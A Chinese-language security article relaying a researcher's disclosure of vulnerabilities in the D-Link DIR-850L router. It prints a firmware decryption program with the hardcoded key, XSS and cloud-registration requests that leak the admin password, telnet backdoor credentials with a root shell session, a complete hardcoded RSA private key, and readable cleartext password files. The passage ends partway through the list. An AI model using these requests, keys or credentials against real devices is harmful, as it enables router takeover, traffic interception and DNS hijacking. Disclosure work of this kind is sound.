导语:研究人员称,D-Link 850L是一款设计糟糕的路由器,存在大量漏洞。从LAN到WAN,所有一切都存在问题。

前言

近期,信息安全研究员皮埃尔·金(Pierre·Kim)公开了D-Link DIR 850L消费级无线路由器存在的10个严重漏洞。

此次公开的D-Link漏洞涉及多方面问题,如缺乏对固件映像的适当保护机制,意味着黑客可以向目标设备注入包含后门的恶意拷贝,以及D-Link私有的mydlink云协议中的漏洞。皮埃尔·金还发现了远程代码执行漏洞、默认密钥,以及DDoS(分布式拒绝服务攻击)风险。其他风险还包括跨站脚本攻击(XSS)、明文存储密码,以及LAN后门等。

皮埃尔·金总结:“D-Link 850L是一款设计糟糕的路由器,存在大量漏洞。从LAN到WAN,所有一切都存在问题。”

一、固件映像缺乏保护

Dlink 850 LrevA的最新固件(DIR850L_REVA_FW114WWb07_h2ab_beta1.bin)不受保护,黑客可以伪造最新固件的映像。

Dlink850LrevB的最新固件映像(DIR850LB1_FW207WWb05.bin、DIR850L_REVB_FW207WWb05_h1ke_beta1.bin和DIR850LB1FW208WWb02.bin)是带有硬编码密码。

以下是一个解密的固件映像的程序:

/* 
 * Simple tool to decrypt D-LINK DIR-850L REVB firmwares 
 *
 * $ gcc -o revbdec revbdec.c
 * $ ./revbdec DIR850L_REVB_FW207WWb05_h1ke_beta1.bin wrgac25_dlink.2013gui_dir850l > DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted
 */

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define USAGE "Usage: decimg <filename> <key>\n"

int main(int    argc,
         char   **argv)
{
        int     i, fi;
        int     fo = STDOUT_FILENO, fe = STDERR_FILENO;

        if (argc != 3)
        {
                write(fe, USAGE, strlen(USAGE));
                return (EXIT_FAILURE);
        }

        if ((fi = open(argv[1], O_RDONLY)) == -1)
        {
                perror("open");
                write(fe, USAGE, strlen(USAGE));
                return (EXIT_FAILURE);
        }

        const char *key = argv[2];
        int kl = strlen(key);

        i = 0;
        while (1)
        {
                char buffer[4096];
                int j, len;
                len = read(fi, buffer, 4096);
                if (len <= 0)
                        break;
                for (j = 0; j < len; j++) {
                        buffer[j] ^= (i + j) % 0xFB + 1;
                        buffer[j] ^= key[(i + j) % kl];
                }
                write(fo, buffer, len);
                i += len;
        }

       return (EXIT_SUCCESS);
}

你可以使用这个程序来解密固件映像:

[email protected]:~/petage-dlink$ ./revbdec DIR850L_REVB_FW207WWb05_h1ke_beta1.bin wrgac25_dlink.2013gui_dir850l > DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted
[email protected]:~/petage-dlink$ binwalk DIR850L_REVB_FW207WWb05_h1ke_beta1.decrypted

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             DLOB firmware header, boot partition: "dev=/dev/mtdblock/1"
593           0x251           LZMA compressed data, properties: 0x88, dictionary size: 1048576 bytes, uncompressed size: 65535 bytes
10380         0x288C          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 5184868 bytes
1704052       0x1A0074        PackImg section delimiter tag, little endian size: 10518016 bytes; big endian size: 8298496 bytes
1704084       0x1A0094        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 8296266 bytes, 2678 inodes, blocksize: 131072 bytes, created: 2017-01-20 06:39:29

所以说,固件映像的保护是不存在的。

二、跨站脚本攻击(XSS)

只需通过分析/htdocs/web上的PHP文件,就可以发现一些易受攻击的XSS。

黑客可以使用XSS攻击,经过用户的身份验证,以便窃取身份验证cookie。

/htdocs/web/wpsacts.php:

[email protected]:~/petage-dlink$ wget -qO- --post-data='action=<a>' http://ip:port/wpsacts.php
<?xml version="1.0" encoding="utf-8"?>
<wpsreport>
        <action><a></action>
        <result></result>
        <reason></reason>
</wpsreport>


[email protected]:~/petage-dlink$ cat ./fs/htdocs/web/wpsacts.php
[..]
<wpsreport>
        <action><?echo $_POST["action"];?></action>
[...]

/htdocs/web/shareport.php里的XSS:

[...]
         <action><?echo $_POST["action"];?></action>
[...]

/htdocs/web/sitesurvey.php里的XSS:

[...]
        <action><?echo $_POST["action"];?></action>
[...]

/htdocs/web/wandetect.php里的XSS:

[...]
   <action><?echo $_POST["action"];?></action>
[...]

/htdocs/web/wpsacts.php里的XSS:

[...]
   <action><?echo $_POST["action"];?></action>
[...]

三、mydlink云协议中的漏洞

黑客可以使用自定义的mydlink云协议获得完整的访问权限。

http://ip_of_router/register_send.php不检查用户的身份验证,因此黑客可以滥用此网页来获得对设备的控制,此网页用于将设备注册到myDlink云基础设施。

黑客将使用未经验证的/register_send.php网页来进行:

1.创建MyDlink云帐户;

2.在设备上注册这个账号;

3.将设备添加到这个帐户,这样设备将通过管理密码进入到云平台,同时这意味着密码以明文存储。

首先,黑客将使用Firefox50访问Dlink登录页https://www.mydlink.net.cn/entrance,黑客会利用该网页远程控制设备(比如通过重新启动)。不过要注意的是,Firefox50要安装官方的DlinkNPAPI扩展。

其次,使用Firefox开发工具,黑客可以分析来自www.mydlink.com上的Dlinkapi的默认HTTP请求或响应。因为在默认情况下,Dlink云接口将在PUT请求的响应中泄漏设备的密码。仅仅通过看NPAPI插件的HTTP请求,api就可以在明文中找到设备的密码。

最后,NPAPI插件会自动建立一个路由器和Firefox浏览器之间的通道,这样,黑客就可以访问http://127.0.0.1:dynamicaly_generated_remote_port/控制远程路由器。流量将直接进入亚马逊服务器,然后到达远程Dlink路由器::

Firefox NPAPI client (http://127.0.0.1:remote_port/)   ->    Amazon   ->    Dlink 850L HTTP Interface.

黑客将使用来自Dlink api的legitHTTPS响应提供的前一个密码,并能够在路由器内登录。此时,黑客就完成了对路由器的完全控制。

这是通过在Amazon服务器上创建一个TCP通道的signalc程序(/mydlink/内部)实现的。

驻留在http://ip_of_router/register_send.php的PHP脚本,将充当黑客和远程Dlinkapi之间的代理,此页面还将检索密码(它存储在cleartext中)并将其发送到远程Dlink api。

151 $devpasswd = query("/device/account/entry/password"); <- $devpasswd contains the password
152 $action = $_POST["act"];                                 of the device

密码将在设备的关联中发送(第三个请求:adddev)到Mydlink云服务(见&device_password=$devpasswd):

178 //sign up
179 $post_str_signup = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
180                    "&action=sign-up&accept=accept&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"].
181                    "&password_verify=" .$_POST["passwd"]. "&name_first=" .$_POST["firstname"]. "&name_last=" .$_POST["lastname"]." ";
182 
183 $post_url_signup = "/signin/";
184 
185 $action_signup = "signup";
186 
187 //sign in       
188 $post_str_signin = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
189             "&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"]." ";
190 
191 $post_url_signin = "/account/?signin";
192 
193 $action_signin = "signin";
194 
195 //add dev (bind device)
196 $post_str_adddev = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
197             "&dlife_no=" .$mydlink_num. "&device_password=" .$devpasswd. "&dfp=" .$dlinkfootprint." ";
198 
199 $post_url_adddev = "/account/?add";
200 
201 $action_adddev = "adddev";
202 
203 //main start
204 if($action == $action_signup)                    <---- first request
205 {
206         $post_str = $post_str_signup;
207         $post_url = $post_url_signup;
208         $withcookie = "";   //signup dont need cookie info
209 }
210 else if($action == $action_signin)               <---- second request
211 {
212         $post_str = $post_str_signin;
213         $post_url = $post_url_signin;
214         $withcookie = "\r\nCookie:; mydlink=pr2c11jl60i21v9t5go2fvcve2;";
215 }
216 else if($action == $action_adddev)               <---- 3rd request
217 {
218         $post_str = $post_str_adddev;
219         $post_url = $post_url_adddev;
220 }

为了利用这个vuln,让皮埃尔到dlink路由器创建3个HTTP请求:

第一个是signup请求,将在MyDlink服务上创建一个用户:

[email protected]:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=signup&lang=en&[email protected]&passwd=SUPER_PASSWORD&firstname=xxxxxxxx&lastname=xxxxxxxx' http://ip/register_send.php

<?xml version="1.0"?>
<register_send>
   <result>success</result>
   <url>http://mp-us-portal.auto.mydlink.com</url>
</register_send>

在内部,这个请求被制作并发送到MyDlink云api:

179 $post_str_signup = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
180                    "&action=sign-up&accept=accept&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"].
181                    "&password_verify=" .$_POST["passwd"]. "&name_first=" .$_POST["firstname"]. "&name_last=" .$_POST["lastname"]." ";

第一个是signin请求,路由器将与“signin”新创建的用户关联,但未激活:

[email protected]:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=signin&lang=en&[email protected]&passwd=SUPER_PASSWORD&firstname=xxxxxxxx&lastname=xxxxxxxx' http://ip/register_send.php

<?xml version="1.0"?>
<register_send>
  <result>success</result>
  <url>http://mp-us-portal.auto.mydlink.com</url>
</register_send>

在内部,这个请求被制作并发送到MyDlink云api:

188 $post_str_signin = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"].
189             "&email=" .$_POST["outemail"]. "&password=" .$_POST["passwd"]." ";

最后一个请求会将该设备与dlink服务关联,并将该设备的密码发送到dlink的远程api:

[email protected]:~/petage-dlink$ wget -qO- --user-agent="" --post-data 'act=adddev&lang=en' http://ip/register_send.php

<?xml version="1.0"?>
<register_send>
  <result>success</result>
  <url>http://mp-us-portal.auto.mydlink.com</url>
</register_send>

在内部,这个请求被制作并发送到MyDlink云api:

196 $post_str_adddev = "client=wizard&wizard_version=" .$wizard_version. "&lang=" .$_POST["lang"]. 197             "&dlife_no=" .$mydlink_num. "&device_password=" .$devpasswd. "&dfp=" .$dlinkfootprint." ";

现在请使用来自Dlink的邮件确认邮件:

2017-dlink-000-activation-email.png

然后,访问http://mydlink.com/并使用电子邮件和密码登录。

此时,你将看到在web界面中列出的设备。

以下是附件截图,查看可用的管理选项:

2017-dlink-001-webpage.png

2017-dlink-002-webpage.png

2017-dlink-004-webpage.png

通过分析这些请求,皮埃尔可以获得更多关于目标路由器的信息(请注意,在浏览www.mydlink.com网站时,请求是默认的):

2017-dlink-005-dev-tools.png

它出现了PUT(PUTidentifier-of_the_router)请求,以提供与设备的cleartext密码的响应。

2017-dlink-006-dev-tools.png

请注意,在映像的末尾有一个GET请求。

https://eu.mydlink.com/device/devices/DEVICEID?_=SOME_RANDOM_DATA&access_token=ACCESS_TOKEN

POST数据如下

{"id":"EDITED_DEVICE_ID","order":0,"mac":"EDITED_MAC_ADDRESS","model":"DIR-850L","ddnsServer":"eu.mydlink.com","activatedDate":"EDITED_ACTIVATION_DATE","hwVer":"B1","selected":true,"defaultIconUrl":"https://d3n8c69ydsbj5n.cloudfront.net/Product/Pictures/DIR-850L/DIR-850L_default.gif","type":"router","series":"","name":"","authKey":"","status":"","adminPassword":"","plainPassword":"","fwUpgrade":false,"fwVer":"","provVer":"","binded":true,"registered":null,"supportHttps":null,"signalAddr":"","features":[],"serviceCnvr":{"enabled":false,"plan":"","space":0,"expireTime":0,"contentValidThru":0},"serviceLnvr":{"targetStorageId":null,"targetStorageVolumeId":null},"added2UniPlugin":false,"connections":[{"id":"http","scheme":"http","tunnel":null,"ip":null,"port":null},{"id":"httpWithCredential","scheme":"http","tunnel":null,"ip":null,"port":null},{"id":"https","scheme":"https","tunnel":null,"ip":null,"port":null},{"id":"httpsWithCredential","scheme":"https","tunnel":null,"ip":null,"port":null},{"id":"liveview","scheme":"","tunnel":null,"ip":null,"port":null},{"id":"playback","scheme":"","tunnel":null,"ip":null,"port":null},{"id":"config","scheme":"","tunnel":null,"ip":null,"port":null}]}

在cleartext(包含设备的密码),响应是:

{"name":"DIR-850L","status":"online","authKey":"EDITED","adminPassword":"password","plainPassword":"password","fwUpgrade":false,"fwVer":"2.07","provVer":"2.0.18-b04","binded":true,"registered":true,"supportHttps":true,"signalAddr":"mp-eu-signal.auto.mydlink.com","features":[1,2,3,4,28,29],"serviceCnvr":{"enabled":false,"plan":"","space":0,"expireTime":0,"contentValidThru":0},"serviceLnvr":{"targetStorageId":null,"targetStorageVolumeId":null}}

这样,一个GET请求就完成了(上一个映像中的最后一个),它允许检索当前密码和之前的密码:

2017-dlink-get-password.png

GET请求如下:

GET https://eu.mydlink.com/device/devices/DEVICE_ID?_=RANDOM_NUMBER&access_token=ACCESS_TOKEN HTTP/1.1

响应还是一样的,使用前一个明文密码和新密码(adminPassword):

{"name":"DIR-850L","status":"online","authKey":"EDITED","adminPassword":"password","plainPassword":"PASSWORD","fwUpgrade":false,"fwVer":"2.07","provVer":"2.0.18-b04","binded":true,"registered":true,"supportHttps":true,"signalAddr":"mp-eu-signal.auto.mydlink.com","features":[1,2,3,4,28,29],"serviceCnvr":{"enabled":false,"plan":"","space":0,"expireTime":0,"contentValidThru":0},"serviceLnvr":{"targetStorageId":null,"targetStorageVolumeId":null}}

最后,来自NPAPI插件的请求,处于浏览器和远程路由器之间的通道:

2017-dlink-get-password.png

对/tssm/tssml.php的请求会使远程云平台将流量转发到设备编号3xxxxxxxxx,通过云平台,这将为黑客提供从浏览器NPAPI扩展到DLINK850L路由器的新建立的TCP通道的信息:

https://eu.mydlink.com/tssm/tssml.php?id=EDITED&no=EDITED_DEVICE_ID&type=1&state=3&status=1&ctype=4&browser=Mozilla/5.0+(Windows+NT+6.1;+rv:50.0)+Gecko/20100101+Firefox/50.0&message=[{"service":"http","scheme":"http","tunnel":"relay","ip":"127.0.0.1","port":50453},{"service":"https","scheme":"https","tunnel":"relay","ip":"127.0.0.1","port":50454}]&_=EDITED_RANDOM_VALUE

看起来插件会监测127.0.0.1:50453/tcp(HTTP)和127.0.0.1:50454/tcp(HTTP/SSL),如下所示:

2017-dlink-008-cmd.png

现在,让皮埃尔浏览http://127.0.0.1:50453,通过云协议将流量发送到远程路由器。

2017-dlink-009-router.png

通过使用之前发现的泄漏密码(在PUT和GET请求中),黑客可以远程对路由器进行pwn,并更新固件:

2017-dlink-010-router.png

这些漏洞可能会影响一些使用Dlink的NAS、路由器以及摄像头。

有趣的是,DLink将使用mydlink服务存储在cleartext中的所有设备密码。

四、路由器WAN云协议中的漏洞

MyDlink云协议很弱,默认情况下,该技术不提供加密,它只是一个基本的TCP中继系统。所有的流量都是通过TCP发送到远程亚马逊服务器的,没有经过加密:

2017-wireshark-54.194.162.84.2048-tcp.png

TCP继电器是以dlink路由器的HTTPS服务器作为端点的,因此,这个路由器可以通过HTTP和HTTPS访问TCP通道。默认情况下,你可以从浏览器(通过通道)查看到路由器的HTTP请求和HTTPS请求。关于HTTPS请求,路由器提供的SSL证书是自签名的。这样,黑客就可以通过伪造和使用一个无效的证书,以便成功的对设备进行中间人攻击和拦截信息。更重要的是,默认情况下,HTTP的TCP继电器是由NPAPI插件制作的。

在路由器内部运行的/mydlink/signalc程序使用该设备的MAC地址来获得一个唯一的标识符,即使dlink设备被重置或链接到新的dlink云帐户,该标识符也不变。用户可以使用rgbin二进制文件更改设备的MAC地址,/usr/sbin/devdata是一个到达/usr/sbin/rgbin的符号链接,并且使用的argv[0]必须是要进行以下运行的devdata这个程序:

# /usr/sbin/devdata dump # will dump all the configuration
# /usr/sbin/devdata set -e lanmac=00:11:22:33:44:55 # will define a new mac address for the lan interface

这个程序只会重写/dev/mtdblock/4的信息。

mydlink接口允许用户输入gmail/hotmail帐户的凭据,然后凭据通过与云协议建立的通道转移到路由器。这似乎并不是一个好主意,因为路由器和云平台之间的流量没有加密,使用自签名证书,而没有经过验证,密码会通过互联网发送到这条通道。

这些漏洞可能会影响一些使用Dlink的NAS、路由器、摄像头以及支持MyDlink云协议的每个设备。

以下是一些wireshark(cleartext流量和自签名证书):

2017-dlink-cloud-cleartext.png

2017-dlink-cloud-ssl.png

五、LAN后门

在revB上,如果你重置了设备,/etc/init0.d/S80mfcd.sh脚本将以下面这些参数启动mfcd二进制文件:

mfcd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &

mfcd实际上是一个telnetd服务器,-u标志用关联的密码($image_sign变量)定义授权用户。

br0是eth0、peth0、wlan0以及wlan1网口的桥梁,这个后门只能从局域网中使用。

[email protected]:~/petage-dlink$ cat fs/etc/init0.d/S80mfcd.sh
#!/bin/sh
echo [$0]: $1 ... > /dev/console
orig_devconfsize=`xmldbc -g /runtime/device/devconfsize` 
entn=`devdata get -e ALWAYS_TN`
if [ "$1" = "start" ] && [ "$entn" = "1" ]; then
        mfcd -i br0 -t 99999999999999999999999999999 &
        exit
fi

if [ "$1" = "start" ] && [ "$orig_devconfsize" = "0" ]; then

        if [ -f "/usr/sbin/login" ]; then
                image_sign=`cat /etc/config/image_sign`
                mfcd -l /usr/sbin/login -u Alphanetworks:$image_sign -i br0 &
        else
                mfcd &
        fi 
else
        killall mfcd
fi

通过使用loginAlphanetworks和wrgac25_dlink.2013gui_dir850l密码,黑客可以在设备上得到一个具有Root权限的Shell:

[email protected]:~/petage-dlink$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Login: Alphanetworks
Password: wrgac25_dlink.2013gui_dir850l


BusyBox v1.14.1 (2017-01-20 14:35:27 CST) built-in shell (msh)
Enter 'help' for a list of built-in commands.

# echo what
what
#

六、私钥漏洞

密钥是在固件内硬编码过的,可以使用HTTPS管理,这就允许黑客进行SSL中间人攻击:

# ls -la /etc/stunnel.key
-rwxr-xr-x    1 root     root         1679 Jan 20  2017 /etc/stunnel.key
# cat /etc/stunnel.key
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAo/0bZcpc3Npc89YiNcP+kPxhLCGLmYXR4rHLt2I1BbnkXWHk
MY1Umfq9FAzBYSvPYEGER4gYq467yvp5wO97CUoTSJHbJDPnp9REj6wLcMkG7R9O
g8/WuQ3hsoexPu4YkjJXPhtQ6YkV7seEDgP3C2TNqCnHdXzqSs7+vT17chwu8wau
j/VMVZ2FRHU63JQ9DG6PqcudHTW+T/KVnmWXQnspgr8ZMhXobETtdqtRPtxbA8mE
ZeF8+cIoA9VcqP09/VMBbRm+o5+Q4hjtvSrv+W2bEd+BDU+V45ZX8ZfPoEWYjQqI
kv7aMECTIX2ebgKsjCK3PfYUX5PYbVWUV+176wIDAQABAoIBAQCQR/gcBgDQO7t+
uc9dmLTYYYUpa9ZEW+3/U0kWbuyRvi1DUAaS5nMiCu7ivhpCYWZSnTJCMWbrQmjN
vLT04H9S+/6dYd76KkTOb79m3Qsvz18tr9bHuEyGgsUp66Mx6BBsSKhjt2roHjnS
3W29WxW3y5f6NdAM+bu12Ate+sIq8WHsdU0hZD+gACcCbqrt4P2t3Yj3qA9OzzWb
b9IMSE9HGWoTxEp/TqbKDl37Zo0PhRlT3/BgAMIrwASb1baQpoBSO2ZIcwvof31h
IfrbUWgTr7O2Im7OiiL5MzzAYBFRzxJsj15mSm3/v3cZwK3isWHpNwgN4MWWInA1
t39bUFl5AoGBANi5fPuVbi04ccIBh5dmVipy5IkPNhY0OrQp/Ft8VSpkQDXdWYdo
MKF9BEguIVAIFPQU6ndvoK99lMiWCDkxs2nuBRn5p/eyEwnl2GqrYfhPoTPWKszF
rzzJSBKoStoOeoRxQx/QFN35/LIxc1oLv/mFmZg4BqkSmLn6HrFq2suVAoGBAMG1
CqmDs2vU43PeC6G+51XahvRI3JOL0beUW8r882VPUPsgUXp9nH3UL+l9/cBQQgUC
n12osLOAXhWDJWvJquK9HxkZ7KiirNX5eJuyBeaxtOSfBJEKqz/yGBRRVBdBHxT2
a1+gO0MlG6Dtza8azl719lr8m6y2O9pyIeUewUl/AoGAfNonCVyls0FwL57n+S2I
eD3mMJtlwlbmdsI1UpMHETvdzeot2JcKZQ37eIWyxUNSpuahyJqzTEYhf4kHRcO/
I0hvAe7UeBrLYwlZquH+t6lQKee4km1ULcWbUrxHGuX6aPBDBkG+s75/eDyKwpZA
S0RPHuUv2RkQiRtxsS3ozB0CgYEAttDCi1G82BxHvmbl23Vsp15i19KcOrRO7U+b
gmxQ2mCNMTVDMLO0Kh1ESr2Z6xLT/B6Jgb9fZUnVgcAQZTYjjXKoEuygqlc9f4S/
C1Jst1koPEzH5ouHLAa0KxjGoFvZldMra0iyJaCz/qHw6T4HXyALrbuSwOIMgxIM
Y00vZskCgYAuUwhDiJWzEt5ltnmYOpCMlY9nx5qJnfcSOld5OHZ0kUsRppKnHvHb
MMVyCTrp1jiH/o9UiXrM5i79fJBk7NT7zqKdI0qmKTQzNZhmrjPLCM/xEwAXtQMQ
1ldI69bQEdRwQ1HHQtzVYgKA9XCmvrUGXRq6E5sp2ky+X1QabC7bIg==
-----END RSA PRIVATE KEY-----
# cat /etc/stunnel_cert.pem
Certificate:
Data:
    Version: 3 (0x2)
    Serial Number:
        87:6f:88:76:87:df:e7:78
    Signature Algorithm: sha1WithRSAEncryption
    Issuer: C=TW, ST=Taiwan, O=None, OU=None, CN=General Root CA/[email protected]
    Validity
        Not Before: Feb 22 06:04:36 2012 GMT
        Not After : Feb 17 06:04:36 2032 GMT
    Subject: C=TW, ST=Taiwan, L=HsinChu, O=None, OU=None, CN=General Router/[email protected]
    Subject Public Key Info:
        Public Key Algorithm: rsaEncryption
            Public-Key: (2048 bit)
            Modulus:
                00:a3:fd:1b:65:ca:5c:dc:da:5c:f3:d6:22:35:c3:
                fe:90:fc:61:2c:21:8b:99:85:d1:e2:b1:cb:b7:62:
                35:05:b9:e4:5d:61:e4:31:8d:54:99:fa:bd:14:0c:
                c1:61:2b:cf:60:41:84:47:88:18:ab:8e:bb:ca:fa:
                79:c0:ef:7b:09:4a:13:48:91:db:24:33:e7:a7:d4:
                44:8f:ac:0b:70:c9:06:ed:1f:4e:83:cf:d6:b9:0d:
                e1:b2:87:b1:3e:ee:18:92:32:57:3e:1b:50:e9:89:
                15:ee:c7:84:0e:03:f7:0b:64:cd:a8:29:c7:75:7c:
                ea:4a:ce:fe:bd:3d:7b:72:1c:2e:f3:06:ae:8f:f5:
                4c:55:9d:85:44:75:3a:dc:94:3d:0c:6e:8f:a9:cb:
                9d:1d:35:be:4f:f2:95:9e:65:97:42:7b:29:82:bf:
                19:32:15:e8:6c:44:ed:76:ab:51:3e:dc:5b:03:c9:
                84:65:e1:7c:f9:c2:28:03:d5:5c:a8:fd:3d:fd:53:
                01:6d:19:be:a3:9f:90:e2:18:ed:bd:2a:ef:f9:6d:
                9b:11:df:81:0d:4f:95:e3:96:57:f1:97:cf:a0:45:
                98:8d:0a:88:92:fe:da:30:40:93:21:7d:9e:6e:02:
                ac:8c:22:b7:3d:f6:14:5f:93:d8:6d:55:94:57:ed:
                7b:eb
            Exponent: 65537 (0x10001)
    X509v3 extensions:
        X509v3 Basic Constraints: 
            CA:FALSE
        Netscape Comment: 
            OpenSSL Generated Certificate
        X509v3 Subject Key Identifier: 
            B5:BF:D1:A5:D6:6F:20:B0:89:1F:A6:C1:58:05:31:B2:B3:D0:C1:01
        X509v3 Authority Key Identifier: 
            keyid:5D:F8:E9:B5:F1:57:A4:90:94:BB:9F:DB:F7:91:95:E7:1C:A2:E7:D2

Signature Algorithm: sha1WithRSAEncryption
    3d:09:22:d0:a6:7d:9c:cd:bd:5b:ad:62:c2:6a:29:12:d1:61:
    88:ca:1e:68:1d:04:dd:40:fb:a9:d3:9f:22:49:dc:fa:fb:3c:
    21:dd:45:a5:53:1a:9b:80:ee:50:16:a6:36:3a:3c:f0:39:27:
    e4:8d:70:20:03:73:7f:26:65:ac:ab:05:b1:84:ee:7c:16:43:
    ca:2f:b5:6b:44:fc:75:a1:c7:86:04:18:b4:df:b2:76:f3:88:
    fb:dc:ec:99:3d:fe:d1:7c:ea:fa:56:eb:0b:d5:69:84:48:3d:
    12:db:d1:ef:f9:89:b0:62:70:ec:be:dd:e6:ef:dd:88:cf:f4:
    e5:ff:1d:88:d5:e0:23:f0:bb:a3:df:8e:8a:05:ea:f3:dc:14:
    49:2d:46:4a:27:40:a6:fc:70:4a:f5:94:3f:94:64:d1:93:7b:
    03:12:75:67:30:ee:8c:07:e1:73:77:00:23:d6:68:20:07:7f:
    8f:4e:1d:e8:76:87:0d:4c:26:f6:56:84:e2:56:98:a0:6c:ad:
    71:21:23:a4:a6:3b:b9:8e:27:13:c2:ae:70:0f:6a:c6:be:b8:
    88:9a:0a:d7:00:39:3a:90:7e:5f:4d:22:88:4e:a6:8a:2f:42:
    b4:dc:18:a4:eb:fa:f1:04:0e:a7:e2:ff:5d:ac:cd:61:28:01:
    7e:d3:01:13
-----BEGIN CERTIFICATE-----
MIIEBDCCAuygAwIBAgIJAIdviHaH3+d4MA0GCSqGSIb3DQEBBQUAMHoxCzAJBgNV
BAYTAlRXMQ8wDQYDVQQIDAZUYWl3YW4xDTALBgNVBAoMBE5vbmUxDTALBgNVBAsM
BE5vbmUxGDAWBgNVBAMMD0dlbmVyYWwgUm9vdCBDQTEiMCAGCSqGSIb3DQEJARYT
d2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xMjAyMjIwNjA0MzZaFw0zMjAyMTcwNjA0
MzZaMIGLMQswCQYDVQQGEwJUVzEPMA0GA1UECAwGVGFpd2FuMRAwDgYDVQQHDAdI
c2luQ2h1MQ0wCwYDVQQKDAROb25lMQ0wCwYDVQQLDAROb25lMRcwFQYDVQQDDA5H
ZW5lcmFsIFJvdXRlcjEiMCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9z
dDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKP9G2XKXNzaXPPWIjXD
/pD8YSwhi5mF0eKxy7diNQW55F1h5DGNVJn6vRQMwWErz2BBhEeIGKuOu8r6ecDv
ewlKE0iR2yQz56fURI+sC3DJBu0fToPP1rkN4bKHsT7uGJIyVz4bUOmJFe7HhA4D
9wtkzagpx3V86krO/r09e3IcLvMGro/1TFWdhUR1OtyUPQxuj6nLnR01vk/ylZ5l
l0J7KYK/GTIV6GxE7XarUT7cWwPJhGXhfPnCKAPVXKj9Pf1TAW0ZvqOfkOIY7b0q
7/ltmxHfgQ1PleOWV/GXz6BFmI0KiJL+2jBAkyF9nm4CrIwitz32FF+T2G1VlFft
e+sCAwEAAaN7MHkwCQYDVR0TBAIwADAsBglghkgBhvhCAQ0EHxYdT3BlblNTTCBH
ZW5lcmF0ZWQgQ2VydGlmaWNhdGUwHQYDVR0OBBYEFLW/0aXWbyCwiR+mwVgFMbKz
0MEBMB8GA1UdIwQYMBaAFF346bXxV6SQlLuf2/eRleccoufSMA0GCSqGSIb3DQEB
BQUAA4IBAQA9CSLQpn2czb1brWLCaikS0WGIyh5oHQTdQPup058iSdz6+zwh3UWl
UxqbgO5QFqY2OjzwOSfkjXAgA3N/JmWsqwWxhO58FkPKL7VrRPx1oceGBBi037J2
84j73OyZPf7RfOr6VusL1WmESD0S29Hv+YmwYnDsvt3m792Iz/Tl/x2I1eAj8Luj
346KBerz3BRJLUZKJ0Cm/HBK9ZQ/lGTRk3sDEnVnMO6MB+FzdwAj1mggB3+PTh3o
docNTCb2VoTiVpigbK1xISOkpju5jicTwq5wD2rGvriImgrXADk6kH5fTSKITqaK
L0K03Bik6/rxBA6n4v9drM1hKAF+0wET
-----END CERTIFICATE-----

七、DNS配置漏洞

黑客可以利用htdocs/parentalcontrols/bind.php文件更改DNS配置,重新配置时,它不会对管理用户的身份进行验证。

在即没有HTTP请求的限制,也没有身份验证的情况下,黑客可以对nonce(?nonce=integer)进行暴力破解(BruteForce):

8 $uptime_limit = query(INF_getinfpath($WAN1)."/open_dns/nonce_uptime") + 1800;
  9 if(query(INF_getinfpath($WAN1)."/open_dns/nonce")!=$_GET["nonce"] || $_GET["nonce"]=="")
10 {
11         $Response="BindError";
12 }
13 else if(query("/runtime/device/uptime") > $uptime_limit)
14 {
15         $Response="BindTimeout";
16 }

然后,黑客可以定义新的DNS服务器:

21         set(INF_getinfpath($WAN1)."/open_dns/deviceid", $_GET["deviceid"]);
22         set(INF_getinfpath($WAN1)."/open_dns/parent_dns_srv/dns1", $_GET["dnsip1"]);
23         set(INF_getinfpath($WAN1)."/open_dns/parent_dns_srv/dns2", $_GET["dnsip2"]);

黑客可以使用这个vuln将流量转发给其控制的服务器,从而进行对Dlink云服务器进行自定义,控制Dlink路由器。

八、明文存储密码漏洞

从下面5个文件中,皮埃尔发现了较弱的权限:

1./var/passwd

/var/passwd在明文中包含凭证,/var/passwd的权限为-rw-rw-rw-(666):

# ls -la /var/passwd
-rw-rw-rw-    1 root     root           28 Jan  1 00:00 /var/passwd
# cat /var/passwd
"Admin" "password" "0"

2./var/etc/hnapasswd

注意,黑客可以使用/var/etc/hnapasswd在cleartext中检索密码:

# cat /var/etc/hnapasswd
Admin:password

/var/etc/hnapasswd的权限是-rw-rw-rw-(666)

# ls -la /var/etc/hnapasswd
-rw-rw-rw-    1 root     root           20 Jan  1 00:00 /var/etc/hnapasswd

3./etc/shadow

/etc/shadow是一个到/var/etc/passwd的符号链接,/var/etc/passwd文件是可读的,如下所示:

# ls -al /etc/shadow 
lrwxrwxrwx    1 root     root           15 Jan 20  2017 /etc/shadow -> /var/etc/shadow
# ls -la /var/etc/shadow
-rw-r--r--    1 root     root           93 Jan  1 00:00 /var/etc/shadow

该文件包含管理用户的DES哈希值:

# cat /var/etc/shadow
root:!:10956:0:99999:7:::
nobody:!:10956:0:99999:7:::
Admin:zVc1PPVw2VWMc:10956:0:99999:7:::

4./var/run/storage_account_root

/var/run/storage_account_root包含在cleartext的凭证中,/var/passwd的权限为-rw-rw-rw-(666)

# ls -la /var/run/storage_account_root
-rw-rw-rw-    1 root     root           40 Jan  1 00:00 /var/run/storage_account_root
# cat /var/run/storage_account_root
admin:password,:::
jean-claude:dusse,:::

5./var/run/hostapd*

